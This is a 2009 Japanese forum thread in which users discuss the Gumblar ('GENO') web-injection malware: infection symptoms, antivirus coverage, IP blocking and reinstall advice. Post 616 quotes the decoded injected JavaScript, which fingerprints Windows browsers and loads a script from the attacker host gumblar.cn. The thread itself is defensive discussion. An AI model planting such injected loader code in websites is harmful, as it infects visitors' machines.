578:名無しさん@お腹いっぱい。
09/05/14 22:20:23
感染してすぐ症状出るものですか?
579:名無しさん@お腹いっぱい。
09/05/14 22:20:33
フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど
特になにもおきない
580:名無しさん@お腹いっぱい。
09/05/14 22:21:25
(\.n 安全安心とっても快適な工夫もいっぱい windowsVISTA みんな買おうよ!
ヽ .ソ
| | ∧_∧
| | ∧_∧ _( ´∀`) ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
\ \( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) n
\ ⌒ ̄ヽ ./~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E)
∩. `、 ./ ̄| //`i / /| //`i / | ヽ ヽ/ /
. (7ヌ)| | (ミ ミ) | ∧__∧ | /(ミ ミ) |∧_∧| | | \__/
/ / ∧_∧ ∧_∧ _( ´∀`) ∧_∧ ∧_∧_(´∀` ) ∧_∧ ||
\ \( ´∀`)―--( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ ⌒ヽ(´∀` ) //
(\.n\ /⌒ ⌒ ̄ヽ /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒ /
ヽ .ソ | |ー、 / ̄| //`i / 、 /| //` i /
| | | | |∧_∧ / (ミ ミ) | | | /(ミ ミ) .| |
| | ∧_∧ _( ´∀`) ∧_∧ | ∧_∧___∧_∧ .|∧_∧ \ ∧_∧.|
\ \( ´∀` ) ̄ ⌒ヽ( ´∀` ) | ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) | . . n
\ ⌒ ̄ヽ . /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E)
∩. `、 ./ ̄| //`i / 、 /| //`i / | ヽ ヽ/ /
. (7ヌ)| | (ミ ミ) | ∧ ∧ | /(ミ ミ) |∧ ∧ | | | \__/
581:名無しさん@お腹いっぱい。
09/05/14 22:22:32
ポットウィルスなら駆除出来るけどこれは難しいのかなぁ
582:名無しさん@お腹いっぱい。
09/05/14 22:24:33
>>580
お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか?
583:名無しさん@お腹いっぱい。
09/05/14 22:25:51
>>567
オレも導入しようとしたが、日本語版とれないな・・・
584:名無しさん@お腹いっぱい。
09/05/14 22:26:21
>>579
>>102は?
585:名無しさん@お腹いっぱい。
09/05/14 22:28:19
aguseでは白だな。>あさがやドラム
586:名無しさん@お腹いっぱい。
09/05/14 22:28:25
質問です。
私、セキュリティソフトはソースネクストの ウィルスセキュリティZERO を使ってるのですが、
このセキュリティソフトはGENOウィルスに対応しているんでしょうか?
587:名無しさん@お腹いっぱい。
09/05/14 22:30:01
>>586
>>575
588:名無しさん@お腹いっぱい。
09/05/14 22:31:58
>>584
アドビ8.13にして全部踏んだけどなんともないわ
589:名無しさん@お腹いっぱい。
09/05/14 22:32:14
>>579
>>432のGoogle セーフ ブラウジングの結果で挙げられている幾つかのサイトはどうか。
590:名無しさん@お腹いっぱい。
09/05/14 22:33:16
>>579
そのサイトも侵されている
591:名無しさん@お腹いっぱい。
09/05/14 22:33:51
Adobe Reader・Acrobat に不正終了やコード実行の脆弱性―JPCERT/CC が注意喚起 - japan.internet.com Webテクノロジー
URLリンク(japan.internet.com)
本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
URLリンク(itpro.nikkeibp.co.jp)
こっちは関係あると思ったらなかった
592:名無しさん@お腹いっぱい。
09/05/14 22:36:15
もうなにがなんだかwwwww
593:名無しさん@お腹いっぱい。
09/05/14 22:45:36
どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ
594:名無しさん@お腹いっぱい。
09/05/14 22:50:36
ポッドウィルス駆除じゃこれは取りきれないか?
595:名無しさん@お腹いっぱい。
09/05/14 22:52:56
ポッドウィルスw
596:名無しさん@お腹いっぱい。
09/05/14 22:57:41
>>594
つ クリーンインストール
597:名無しさん@お腹いっぱい。
09/05/14 23:04:34
>>593
↓このスレから種を拾って直接実行すれば…。
【鑑定目的禁止】検出可否報告スレ10
スレリンク(sec板)
598:名無しさん@お腹いっぱい。
09/05/14 23:04:50
>>595
ごめん。ポットだったw
599:名無しさん@お腹いっぱい。
09/05/14 23:11:33
またかw
BIG-server.com binboserver.com メンテナンス / 障害報告
URLリンク(www.maido3.cc)
600:PG2
09/05/14 23:19:50
PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を
PG2のリスト追加にコピペすればいいのかな?
601:名無しさん@お腹いっぱい。
09/05/14 23:22:43
今北産業 現状のウイルス対策ソフトじゃ対応できないってマジ?
602:名無しさん@お腹いっぱい。
09/05/14 23:24:21
亜種がワラワラ出てきてるwww
対応おっつかねwww
603:名無しさん@お腹いっぱい。
09/05/14 23:25:56
Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん
わかりやすく載せとけよ
604:名無しさん@お腹いっぱい。
09/05/14 23:27:21
maidoの感染は、マァブが原因らしい
605:名無しさん@お腹いっぱい。
09/05/14 23:28:45
具体的に被害が出てるのはOS関連ファイル?
普通のファイルにも感染する?
606:名無しさん@お腹いっぱい。
09/05/14 23:29:00
ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。
607:名無しさん@お腹いっぱい。
09/05/14 23:30:37
対策
* WindowsUpdate
* PDFリーダーを最新にする (AdobeReader や Foxit Reader)
* AdobeFlashを最新にする
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
* Javascriptを切る
* 貼られている怪しいリンクをむやみに開かない
* ウイルス定義ファイルを更新する
↑これの
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
はfirefoxのアドオンで対応できますか?
608:名無しさん@お腹いっぱい。
09/05/14 23:33:05
>>567 >>583 こちらへ
PeerGuardian 33
スレリンク(download板)
609:名無しさん@お腹いっぱい。
09/05/14 23:34:41
>>607
アンチウイルスのFWに設定したほういいと思う
610:名無しさん@お腹いっぱい。
09/05/14 23:36:08
Javascript切ると見れなくなるサイトいっぱいあるじゃん
不便すぎる
611:名無しさん@お腹いっぱい。
09/05/14 23:38:23
adobe関係をアンインストールしときゃなんとかなる?
WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー
強化の為にはまあ必要なことだ。
612:名無しさん@お腹いっぱい。
09/05/14 23:38:59
>>608
ありがとう。スレあったのね。いってきマース
613:名無しさん@お腹いっぱい。
09/05/14 23:41:45
>>609
ウイルスバスターだけど、設定画面みても分からんなw
ひょっとしてできないのかしら・・・
614:名無しさん@お腹いっぱい。
09/05/14 23:54:57
>>613
暇だから調べてみた
URLリンク(virus.bind-web.net)
この辺参考にならん?
615:名無しさん@お腹いっぱい。
09/05/14 23:55:30
>>613
例外ルール(プロトコル)でぐぐれ
616:名無しさん@お腹いっぱい。
09/05/15 00:03:13
>あさがやドラム
解読してみた。
(function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;");
document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g);
真っ黒でつ。
617:名無しさん@お腹いっぱい。
09/05/15 00:06:57
ドクオが混じってるかと思ったら別もんか
("A")
618:名無しさん@お腹いっぱい。
09/05/15 00:09:02
/gumblar.cn・・・
619:名無しさん@お腹いっぱい。
09/05/15 00:12:07
でもこれで感染したサイトへの電凸が容易になったんじゃない?
「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし
(誰もが知っている)大手のサイトだから信用もしてもらいやすくなったはず
620:名無しさん@お腹いっぱい。
09/05/15 00:25:36
>>617
こっちは泣いてるおにゃのこっぽいな> (/_/g);
621:名無しさん@お腹いっぱい。
09/05/15 00:30:32
メガネメガネ ("A" )))....
622:名無しさん@お腹いっぱい。
09/05/15 00:33:44
b "j;")
623:名無しさん@お腹いっぱい。
09/05/15 00:35:38
大山鳴動して鼠一匹
624:名無しさん@お腹いっぱい。
09/05/15 00:40:38
ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ?
で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」
…
625:名無しさん@お腹いっぱい。
09/05/15 00:43:30
どういうこともなにも感染してたんだろう
お兄ちゃんがわかってくれるか心配だね
626:名無しさん@お腹いっぱい。
09/05/15 00:45:01
弟なのか妹なのか
627:名無しさん@お腹いっぱい。
09/05/15 00:45:48
しかし…
この脅威に世間は知らん振りか。
628:名無しさん@お腹いっぱい。
09/05/15 00:50:17
>>624
w
629:名無しさん@お腹いっぱい。
09/05/15 00:51:41
abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか?
630:名無しさん@お腹いっぱい。
09/05/15 00:54:24
>>629
最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。
631:名無しさん@お腹いっぱい。
09/05/15 00:56:05
>>601
事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた
632:名無しさん@お腹いっぱい。
09/05/15 01:04:26
aguse.jpってカスペなの?
633:名無しさん@お腹いっぱい。
09/05/15 01:06:27
>>631
それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。
634:名無しさん@お腹いっぱい。
09/05/15 01:11:38
aviraはどうなの?ちゃんと対応してる?
635:名無しさん@お腹いっぱい。
09/05/15 01:14:07
sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの?
636:名無しさん@お腹いっぱい。
09/05/15 01:14:20
>>634
スレリンク(sec板:862番)
自分で解凍してスキャンかけて確かめろ
637:名無しさん@お腹いっぱい。
09/05/15 01:15:15
ここでも調べられます。 URLリンク(www.gred.jp)
638:名無しさん@お腹いっぱい。
09/05/15 01:17:15
>>634
gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。
639:名無しさん@お腹いっぱい。
09/05/15 01:19:31
国を指定して全てブロック出来れば良いのにね。出来るのかな?日本と米国以外行かないし。
640:名無しさん@お腹いっぱい。
09/05/15 01:28:43
うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた…
IEだったら死んでたな
641:名無しさん@お腹いっぱい。
09/05/15 01:29:15
GENOウイルスってHDも破損するんだろうか?
なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…
642:名無しさん@お腹いっぱい。
09/05/15 01:33:34
ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で
IE6にて、あさがやドラム のURLを開くと 「危険なサイト アドレス http://gumblar.cn/rss/?id=568835」とメッセージが出た
643:名無しさん@お腹いっぱい。
09/05/15 01:36:45
UnderForge of Lack ≫ Zlkon, Gumblar 問題に関して
URLリンク(www3.atword.jp)
%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
644:名無しさん@お腹いっぱい。
09/05/15 01:39:56
gumblarに感染してたサイトのお詫び文が、
ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、
avastユーザからの指摘がウザイので一応アップし直します
のように書いてあってなんだか悔しくなった
感染してもはっきり分からないから世間の感覚はこんなもんか
645:名無しさん@お腹いっぱい。
09/05/15 01:40:18
初心なことかもしれないけど
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
を制限するさいtcpとudpどっちなの?
646:名無しさん@お腹いっぱい。
09/05/15 01:42:21
アップし直すだけじゃ無駄なのにな
647:名無しさん@お腹いっぱい。
09/05/15 01:44:33
>>643
これ、次スレのテンプレに入れた方が良いんじゃね?
648:642
09/05/15 01:45:41
>>644
ウイルスバスターでもブロックはできているみたいだ
649:644
09/05/15 01:48:40
>>648
おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから
650:名無しさん@お腹いっぱい。
09/05/15 01:48:58
>>645
TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね
651:642
09/05/15 01:53:32
>>649
ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ
652:名無しさん@お腹いっぱい。
09/05/15 01:56:32
久しぶりに踏んでみたがリファラをチェックするようになったんだな
リファラ切ってるとpdfもswfも読み込まれない
653:名無しさん@お腹いっぱい。
09/05/15 01:56:41
>>650
おk
ありがとう
654:名無しさん@お腹いっぱい。
09/05/15 01:57:19
>>645
どちらかを制限しない理由があるのか?
655:名無しさん@お腹いっぱい。
09/05/15 02:01:07
すっげーやばそうなウイルスなのに
あまり騒がれていないのは気のせいなの?
656:名無しさん@お腹いっぱい。
09/05/15 02:01:22
>>644
パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。
657:名無しさん@お腹いっぱい。
09/05/15 02:02:26
>>641
運が悪いと壊れるかもしれないけど切断とHDD関係なくね?
658:名無しさん@お腹いっぱい。
09/05/15 02:02:41
パスワード変えても無駄
659:名無しさん@お腹いっぱい。
09/05/15 02:05:20
管理者のPCのOSをクリーンインスコして、パスワードを変える。
660:名無しさん@お腹いっぱい。
09/05/15 02:06:19
バスターはフィルタリング機能があるから
URLブラックリストに登録されれば遮断してくれるということか
661:名無しさん@お腹いっぱい。
09/05/15 02:06:28
URLリンク(jvnrss.ise.chuo-u.ac.jp)
URLリンク(detail.chiebukuro.yahoo.co.jp)
URLリンク(excomp.cocolog-nifty.com)
URLリンク(puppet.asablo.jp)
URLリンク(dxd8.com)
URLリンク(ilion.blog.shinobi.jp)
662:名無しさん@お腹いっぱい。
09/05/15 02:08:20
>>655
気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・
663:名無しさん@お腹いっぱい。
09/05/15 02:08:31
URLリンク(blogs.yahoo.co.jp)
URLリンク(excomp.cocolog-nifty.com)
告知情報はこんなもんか?
豚インフルの比じゃねえ はんぱねえ感染力!
664:名無しさん@お腹いっぱい。
09/05/15 02:11:16
GENOは結局どこからこのウイルス持ってきたんだろ。
665:名無しさん@お腹いっぱい。
09/05/15 02:11:38
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
666:名無しさん@お腹いっぱい。
09/05/15 02:12:32
>>662
動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ
667:名無しさん@お腹いっぱい。
09/05/15 02:13:33
>>665
Gumblarさん、マジパネェっす!
668:名無しさん@お腹いっぱい。
09/05/15 02:15:49
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
669:名無しさん@お腹いっぱい。
09/05/15 02:16:31
俺は考えるのをやめた
670:名無しさん@お腹いっぱい。
09/05/15 02:19:18
>>666
だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・
671:名無しさん@お腹いっぱい。
09/05/15 02:33:38
>>508
参考にしてみた
thx
672:名無しさん@お腹いっぱい。
09/05/15 02:34:21
GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな
・JavaScriptオフ
GENOの例を見る限り改竄はリモートから行われている。
今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。
この場合JSオフでの対応は不可能。
・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う
攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。
最悪の場合ゼロデイを狙われる可能性もある。
・IE以外のブラウザを使う
Adobe関連の脆弱性はブラウザに依存しない。
・IPまたはドメインでブロック
攻撃コードを更新していくらでも別のサーバに振り向けることが可能。
・アンチウィルスでの対応
攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。
673:名無しさん@お腹いっぱい。
09/05/15 02:35:18
>>666
readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい(ニコ動は警告出してたような)
readerの方はアップデートしない人多いだろうなあ
674:名無しさん@お腹いっぱい。
09/05/15 02:39:38
GENOにかかるとネットに繋がる時間が長くなるってほんと?
Googleに全然つながらないんだが
675:名無しさん@お腹いっぱい。
09/05/15 02:42:26
Flash Playerを無効にしたらどう?
IEだと切り替え大変だけれど
676:名無しさん@お腹いっぱい。
09/05/15 02:48:20
ネットのインフルエンザはパンデミックだな
てか無自覚で感染してるPC多いんじゃないか?
677:名無しさん@お腹いっぱい。
09/05/15 02:49:11
何か感染したと思ったんだけど
いろんなチェックしてたらIE落ちなくなったわ
でもゲームが反応無しになる、なんだこれ
678:名無しさん@お腹いっぱい。
09/05/15 02:49:27
はんぱねえ
679:名無しさん@お腹いっぱい。
09/05/15 02:51:31
何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの?
680:名無しさん@お腹いっぱい。
09/05/15 02:58:19
WinMeなんですが、GENOウイルスに感染する危険はありますか?
XPはヤバイと聞きますが・・・
681:名無しさん@お腹いっぱい。
09/05/15 02:59:24
Meの情報ないね どうなの?
682:名無しさん@お腹いっぱい。
09/05/15 03:03:17
これが後に語り継がれるMe最強伝説の始まりである。
683:名無しさん@お腹いっぱい。
09/05/15 03:03:27
親父が頑なにjavaオンのIEを使いたがる
切り替えが楽なプニルや火狐も入れといて説明したのに
684:名無しさん@お腹いっぱい。
09/05/15 03:07:07
>>672
ジャバスクいつも切っていて火狐でネトサフしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染0だったがブートスキャンも
しといたほうがいいかな?
685:名無しさん@お腹いっぱい。
09/05/15 03:09:05
JavaScriptオフでも感染!?
686:名無しさん@お腹いっぱい。
09/05/15 03:12:06
>>684
俺、avastでチェストに隔離できなかったんだけど大丈夫かな?
687:名無しさん@お腹いっぱい。
09/05/15 03:17:39
豚どころじゃねえぞ おい
688:名無しさん@お腹いっぱい。
09/05/15 03:18:59
これ対策でAdobe Readerを9に入れ替えたけど、
実は6.0.6を使ってた方が安全だったりする?w
689:名無しさん@お腹いっぱい。
09/05/15 03:19:38
オフにして感染されちゃどうしようもないなぁ
690:名無しさん@お腹いっぱい。
09/05/15 03:23:02
>>684
JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。
691:名無しさん@お腹いっぱい。
09/05/15 03:24:17
はやい話でIEが狙われているのですか?
692:名無しさん@お腹いっぱい。
09/05/15 03:25:25
>>686
他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおkで終わった
今日のは右下に三つくらい説明が出てクリックしたらおkが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た
因みにフラッシュは最新版だがリーダーは7
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない
693:名無しさん@お腹いっぱい。
09/05/15 03:27:23
>>691
はやい話でそういうこと
しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ
694:名無しさん@お腹いっぱい。
09/05/15 03:32:29
>>692
俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにIEを閉じたんだよ
で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね
んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・
これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな?
チェストに移動できなかったのは、すぐにブラウザを閉じたから?
695:名無しさん@お腹いっぱい。
09/05/15 03:32:58
感染サイトにアクセスしてしまったよ
Avastがブロックしてくれたよ ママン…
いったいこのウイルスは
どのくらいの規模なのですか?
696:名無しさん@お腹いっぱい。
09/05/15 03:33:19
>>695
チェストに移動できた?
697:名無しさん@お腹いっぱい。
09/05/15 03:34:15
>>690
怖くてソース覗きに行く勇気ありませんw
二回ともジャバスクきった状態で警告された
隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった
698:名無しさん@お腹いっぱい。
09/05/15 03:37:13
さっき知って飛んできました
みごとに感染してました オワタ
699:名無しさん@お腹いっぱい。
09/05/15 03:38:14
感染したらどうすればいいですか?
700:名無しさん@お腹いっぱい。
09/05/15 03:38:22
感染しているか、していないか確認する方法ってありますかね?
701:名無しさん@お腹いっぱい。
09/05/15 03:40:52
>>700
>>665にあります
感染したらインストールし直すしかないのでしょうか?
702:名無しさん@お腹いっぱい。
09/05/15 03:42:53
>>699
ご愁傷さま
PCのOSクリーンインスコ入れ替えれ
703:名無しさん@お腹いっぱい。
09/05/15 03:43:36
>>697
ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め
704:名無しさん@お腹いっぱい。
09/05/15 03:44:03
Avastが活躍する話が多いな
Aviraから乗り換えようか悩む
705:名無しさん@お腹いっぱい。
09/05/15 03:44:07
キャッシュはこれか?
URLリンク(support.mozilla.com)のキャッシュファイルがウイルスに感染した
706:名無しさん@お腹いっぱい。
09/05/15 03:45:43
スレを見返したり、まとめ見たり、ググったりすればすぐわかることだと思うけど、
クリーンインストール以外の解決策は今のところないよ
707:名無しさん@お腹いっぱい。
09/05/15 03:46:34
あの今日一日で3つも感染しているホームページを開いてしまいました
TVはインフルエンザよりもこっちを報道するべきじゃないですか
708:名無しさん@お腹いっぱい。
09/05/15 03:50:16
>>701
Meの場合は、どのファイルを見ればいいですか?
709:名無しさん@お腹いっぱい。
09/05/15 03:53:32
Meまだ使ってる人多いのかな?
感染報告ないよね。気になるなぁ
710:名無しさん@お腹いっぱい。
09/05/15 03:55:10
Me使っているくらいなら
感染していても無自覚なんじゃないか?
711:名無しさん@お腹いっぱい。
09/05/15 03:55:24
>>698
何で調べたの?
712:名無しさん@お腹いっぱい。
09/05/15 03:56:01
firefoxの話題が多いようだからさっきfirefox導入して
ieのお気に入りをfirefoxにインポートしたんだけど
そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい
一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど
今回の件と関係あるかな?
713:名無しさん@お腹いっぱい。
09/05/15 03:58:19
>>711
上に出ていた方法で調べました
どうしよう orz
714:名無しさん@お腹いっぱい。
09/05/15 03:58:26
>>712
spybotスレに似たような報告があったと思うが
誤検出っぽいよ
715:名無しさん@お腹いっぱい。
09/05/15 03:58:28
とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。
以前もこんな感じのことがあったよな。
その時は犯人が逮捕されたけれど。
勿論、外国で外国人が逮捕されたわけだがな。
被害が世界中に及ぶから性質が悪い。
716:名無しさん@お腹いっぱい。
09/05/15 04:00:34
>>591
>本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
>URLリンク(itpro.nikkeibp.co.jp)
の
>このプログラムをウイルスだと判定したのは14製品だけだった
この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。
717:名無しさん@お腹いっぱい。
09/05/15 04:00:41
ここまで危険なウイルスっていままでにあった?
知り合いが感染していたよ。
まじやばい。
718:名無しさん@お腹いっぱい。
09/05/15 04:03:33
ニフティのオンラインスキャンしたけど感染してなくてほっとした。
バスター2009いれてて、URLフィルタもフィッシングブロックも有効にしてるけど
XPだから油断できないな…
firefoxでも危険なんだよなコレ?
うかつにネサフできねーじゃん…
719:名無しさん@お腹いっぱい。
09/05/15 04:04:34
>>714
ええ、そうなの?
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx
720:名無しさん@お腹いっぱい。
09/05/15 04:05:39
感染したかどうかがわからんが
ニコニコみてたら(クリックした時)IEがよく固まるな。
つーか、発見から3ヶ月くらいたってない?
いまだ解決策はおろか、判別法も無しかよw
721:名無しさん@お腹いっぱい。
09/05/15 04:06:19
sqlsodbc.chmはとりあえず改ざんされてない場合の場所に
ファイル名実行できた
AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST
スキャンで感染0だったからもう寝るヽ(`Д´)ノ
722:名無しさん@お腹いっぱい。
09/05/15 04:06:40
>>610
気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・
723:名無しさん@お腹いっぱい。
09/05/15 04:07:04
発見から3ヶ月もたってるのか?これ。
さっきブログではじめて知ったよ。
どこかで報道されていないの?
724:名無しさん@お腹いっぱい。
09/05/15 04:08:15
>>720
genoで見つかったのが4月最初くらいじゃなかったか?だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど
725:名無しさん@お腹いっぱい。
09/05/15 04:08:35
システムの復元は無意味?
726:名無しさん@お腹いっぱい。
09/05/15 04:10:22
>>725
クリンインスコをおすすめ
システムそのものを書き換えます
727:名無しさん@お腹いっぱい。
09/05/15 04:10:42
>>725
感染したんならクリーンインストール以外は意味ないよ
728:名無しさん@お腹いっぱい。
09/05/15 04:10:46
4月に楽天のスレでGENO感染楽天店舗対応最悪で
プチ祭があったけど我が身に這い寄ってくるとは
おもなんだナイアルラトホテプ
729:名無しさん@お腹いっぱい。
09/05/15 04:12:05
>>727
はっきりと感染ってどうやったら判明するのか
明確な基準ないよな
730:名無しさん@お腹いっぱい。
09/05/15 04:13:18
>>724
1ヶ月半なら、もっとニュースになっていてもいいよね?
検索してみても個人のページしか出てこないや
731:名無しさん@お腹いっぱい。
09/05/15 04:15:54
感染したら、クリーンインストールするしかない
って言うけどさ、そもそも感染しているのかどうか判別できないんだけど?
感染の有無を判定する方法って何か無いの?
732:名無しさん@お腹いっぱい。
09/05/15 04:16:02
GENOウイルス大活躍だな、なんでこんなにすごいんだ?
733:名無しさん@お腹いっぱい。
09/05/15 04:16:16
>>718
IEよりはだいぶましだが油断は禁物
734:名無しさん@お腹いっぱい。
09/05/15 04:17:23
>>731
過去スレ、ちゃんと見たか?
完璧な判定方法がないからやべえんだよ、こいつは。
735:名無しさん@お腹いっぱい。
09/05/15 04:17:36
とりあえず、avastでチェックかけたら大丈夫だった
あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな?
736:名無しさん@お腹いっぱい。
09/05/15 04:20:40
現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない
感じ?
どこのサイトで感染するか分からないという恐ろしい事態だな
(((( ;゚Д゚)))ガクガクブルブル
737:名無しさん@お腹いっぱい。
09/05/15 04:21:01
URLリンク(www3.atword.jp)
こちらを見るとすごおおおおおおおくまずそうなのですが
この予感は当たっていますか?
NTTが感染しているなんて、信じられないのですが
738:名無しさん@お腹いっぱい。
09/05/15 04:22:52
>>736
その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い
739:名無しさん@お腹いっぱい。
09/05/15 04:24:55
>>736
んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう
>>737
そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい
740:名無しさん@お腹いっぱい。
09/05/15 04:25:07
Adobe Readerってアンインストールしてもいいんですか?
741:名無しさん@お腹いっぱい。
09/05/15 04:25:56
>>740
使わないんならいいんじゃね?
不便だけどさw
742:名無しさん@お腹いっぱい。
09/05/15 04:27:41
>>741
このウィルス知ってから何もかも恐る恐るって感じなんですよ・・・
とりあえず滅多に使わないんで消しときました
レスありがとうございます
743:名無しさん@お腹いっぱい。
09/05/15 04:27:46
ウイルスバスター終わったので寝ます orz
明日みんなに連絡しなくちゃ…
みなさんもお気を付けて
744:名無しさん@お腹いっぱい。
09/05/15 04:29:10
>>717
7年ぐらい前かNimdaの騒ぎは凄かったな。
NHKの7時のニュースでもトップ扱いだったかな。
745:名無しさん@お腹いっぱい。
09/05/15 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746:名無しさん@お腹いっぱい。
09/05/15 04:31:09
>>745
( ゚Д゚)
何だと・・・?
747:名無しさん@お腹いっぱい。
09/05/15 04:31:11
>>737
もう一体何が起こってるのかさっぱりなんだが・・・
大塚製薬とSayMoveのほかにNTTまで感染してんの??
